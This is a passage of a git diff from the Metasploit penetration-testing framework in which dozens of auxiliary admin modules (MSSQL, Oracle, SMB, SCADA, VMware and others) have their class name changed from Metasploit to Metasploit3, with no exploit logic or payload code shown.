Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) diff --git a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb index 14098f68c5..25c01c9f28 100644 --- a/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) diff --git a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb index f8af375143..ec3ce10323 100644 --- a/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb +++ b/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index c38651085b..27b931c1a7 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/misc/sercomm_dump_config.rb b/modules/auxiliary/admin/misc/sercomm_dump_config.rb index 8b4b10040d..170a40091e 100644 --- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb +++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/auxiliary/report' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/misc/wol.rb b/modules/auxiliary/admin/misc/wol.rb index f7ddd95767..8afcd0100e 100644 --- a/modules/auxiliary/admin/misc/wol.rb +++ b/modules/auxiliary/admin/misc/wol.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index 4ab1149d86..187b8a7d25 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index 13123a6caa..d067729154 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index f2f1753ec0..b7272a17cc 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb index 2341d62565..27ad860676 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb index 1e490fcc02..dc6b36654f 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb index 5e1b9205ff..dd90b59eef 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb index b5b334e591..f691a81169 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb index bc1a78853f..95bc7a1694 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_dbowner_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb index ccf1a84775..bd5d6ade57 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index 85a969f930..9a4493717f 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/mssql_commands' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb index 8d3cf1cb93..c81ae1b467 100644 --- a/modules/auxiliary/admin/mssql/mssql_exec.rb +++ b/modules/auxiliary/admin/mssql/mssql_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb index 849f52782d..976ce09e8b 100644 --- a/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb +++ b/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index 80fb25174c..f97100c2e9 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -14,7 +14,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb index 7e51c2b781..689739c228 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb index 13077f1743..4b4c796a25 100644 --- a/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL_SQLI diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index fcf9e19c06..0ace058218 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mssql/mssql_sql_file.rb b/modules/auxiliary/admin/mssql/mssql_sql_file.rb index b1e6347114..8c64f49cca 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql_file.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index 16c07d7b66..5bb0e6830f 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index abb02846aa..56578fa36f 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL diff --git a/modules/auxiliary/admin/natpmp/natpmp_map.rb b/modules/auxiliary/admin/natpmp/natpmp_map.rb index cb2dc78458..731a58e444 100644 --- a/modules/auxiliary/admin/natpmp/natpmp_map.rb +++ b/modules/auxiliary/admin/natpmp/natpmp_map.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index 7210dfac19..8ec139cec0 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index d9f944d327..c9b9faccbb 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index 0d68f5c206..e33a0db012 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'csv' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index e5a7d5c7a6..ee9efbb905 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 2d414f5043..44e67f20d0 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index c1b9066d2d..581c65d9ac 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index cfd25721f1..94a16f0d72 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index 29d0248f72..d9355644a7 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index f52243b6dc..c5f9453f72 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index 5932005f8b..a9140ed59d 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::ORACLE diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index 45ccb40946..d7e50deacb 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index 10079b8013..61c7a66ec0 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TNS diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index 926f063900..d8e837f799 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Pop2 diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index 2c7f37dddc..fa3abf8d31 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 9a4f868473..9a811c4d1d 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres diff --git a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb index 64ecee853e..684d043437 100644 --- a/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb +++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb index f8353eb35b..2251e33566 100644 --- a/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb +++ b/modules/auxiliary/admin/scada/ge_proficy_substitute_traversal.rb @@ -6,7 +6,7 @@ require 'uri' require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/modicon_command.rb b/modules/auxiliary/admin/scada/modicon_command.rb index 119d1e90c9..53bf52ea84 100644 --- a/modules/auxiliary/admin/scada/modicon_command.rb +++ b/modules/auxiliary/admin/scada/modicon_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/modicon_password_recovery.rb b/modules/auxiliary/admin/scada/modicon_password_recovery.rb index 17cc642db4..aabbdc4cc3 100644 --- a/modules/auxiliary/admin/scada/modicon_password_recovery.rb +++ b/modules/auxiliary/admin/scada/modicon_password_recovery.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb index e5d774a7b2..4906829d56 100644 --- a/modules/auxiliary/admin/scada/modicon_stux_transfer.rb +++ b/modules/auxiliary/admin/scada/modicon_stux_transfer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index 65556a61d9..6abc81f58e 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Rex::Socket::Tcp diff --git a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb index 9deda443f7..6d0dde4b03 100644 --- a/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb +++ b/modules/auxiliary/admin/scada/yokogawa_bkbcopyd_client.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::TcpServer diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index dd88da9dd5..b12195b257 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DCERPC include Rex::Platforms::Windows diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index d9cdc28890..3f85ac29ef 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/delete_file.rb b/modules/auxiliary/admin/smb/delete_file.rb index edf8bf69cc..417aea54d2 100644 --- a/modules/auxiliary/admin/smb/delete_file.rb +++ b/modules/auxiliary/admin/smb/delete_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb index 36b9114390..d6aa05a4b6 100644 --- a/modules/auxiliary/admin/smb/download_file.rb +++ b/modules/auxiliary/admin/smb/download_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index f27d5d81fe..53e52f66e8 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 969095b94e..77c3daa7f0 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client::Psexec include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index ddec2b10e9..ed89e046a5 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client::Psexec diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index 044d27065e..e0c7b914b6 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index 85449a0b61..b52f54f8a1 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::SMB::Client diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 33c6f753bd..24d11c9978 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC diff --git a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb index e4a663be2e..9618c5eed9 100644 --- a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb +++ b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Rex::Proto::TFTP include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index d30bc19800..5e63df3926 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/admin/upnp/soap_portmapping.rb b/modules/auxiliary/admin/upnp/soap_portmapping.rb index d11e355060..4ddc743e52 100644 --- a/modules/auxiliary/admin/upnp/soap_portmapping.rb +++ b/modules/auxiliary/admin/upnp/soap_portmapping.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize diff --git a/modules/auxiliary/admin/vmware/poweroff_vm.rb b/modules/auxiliary/admin/vmware/poweroff_vm.rb index b7541841b1..08d8294543 100644 --- a/modules/auxiliary/admin/vmware/poweroff_vm.rb +++ b/modules/auxiliary/admin/vmware/poweroff_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/poweron_vm.rb b/modules/auxiliary/admin/vmware/poweron_vm.rb index 1df36a75c4..826dd96338 100644 --- a/modules/auxiliary/admin/vmware/poweron_vm.rb +++ b/modules/auxiliary/admin/vmware/poweron_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/admin/vmware/tag_vm.rb b/modules/auxiliary/admin/vmware/tag_vm.rb index 967252f9e8..30de864641 100644 --- a/modules/auxiliary/admin/vmware/tag_vm.rb +++ b/modules/auxiliary/admin/vmware/tag_vm.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include 